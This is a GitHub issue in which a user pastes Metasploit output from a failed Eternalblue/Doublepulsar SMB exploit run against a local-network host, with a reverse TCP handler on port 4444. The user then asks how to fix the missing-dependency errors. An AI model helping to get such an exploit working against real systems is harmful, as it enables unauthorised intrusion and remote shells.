shubhammahale123 / shubham

0 stars 0 forks source link

Eternal blue #1

Open shubhammahale123 opened 3 years ago

shubhammahale123 commented 3 years ago

[] Started reverse TCP handler on 192.168.43.80:4444 [] 192.168.43.3:445 - Generating Eternalblue XML data cp: cannot stat '/root/Eternalblue-Doublepulsar-Metasploit/deps//Eternalblue-2.2.0.Skeleton.xml': No such file or directory sed: can't read /root/Eternalblue-Doublepulsar-Metasploit/deps//Eternalblue-2.2.0.xml: No such file or directory sed: can't read /root/Eternalblue-Doublepulsar-Metasploit/deps//Eternalblue-2.2.0.xml: No such file or directory sed: can't read /root/Eternalblue-Doublepulsar-Metasploit/deps//Eternalblue-2.2.0.xml: No such file or directory sed: can't read /root/Eternalblue-Doublepulsar-Metasploit/deps//Eternalblue-2.2.0.xml: No such file or directory [] 192.168.43.3:445 - Generating Doublepulsar XML data cp: cannot stat '/root/Eternalblue-Doublepulsar-Metasploit/deps//Doublepulsar-1.3.1.Skeleton.xml': No such file or directory sed: can't read /root/Eternalblue-Doublepulsar-Metasploit/deps//Doublepulsar-1.3.1.xml: No such file or directory sed: can't read /root/Eternalblue-Doublepulsar-Metasploit/deps//Doublepulsar-1.3.1.xml: No such file or directory sed: can't read /root/Eternalblue-Doublepulsar-Metasploit/deps//Doublepulsar-1.3.1.xml: No such file or directory sed: can't read /root/Eternalblue-Doublepulsar-Metasploit/deps//Doublepulsar-1.3.1.xml: No such file or directory sed: can't read /root/Eternalblue-Doublepulsar-Metasploit/deps//Doublepulsar-1.3.1.xml: No such file or directory sed: can't read /root/Eternalblue-Doublepulsar-Metasploit/deps//Doublepulsar-1.3.1.xml: No such file or directory [] 192.168.43.3:445 - Generating payload DLL for Doublepulsar [] 192.168.43.3:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll [] 192.168.43.3:445 - Launching Eternalblue... sh: 1: cd: can't cd to /root/Eternalblue-Doublepulsar-Metasploit/deps/ 0009:err:module:wine_process_init L"C:\windows\system32\Eternalblue-2.2.0.exe" not found [-] 192.168.43.3:445 - Are you sure it's vulnerable? [*] 192.168.43.3:445 - Launching Doublepulsar... sh: 1: cd: can't cd to /root/Eternalblue-Doublepulsar-Metasploit/deps/ 002c:err:module:wine_process_init L"C:\windows\system32\Doublepulsar-1.3.1.exe" not found [-] 192.168.43.3:445 - Oops, something was wrong! [*] Exploit completed, but no session was created. msf6 exploit(windows/smb/et

shubhammahale123 commented 3 years ago

How to solve this problem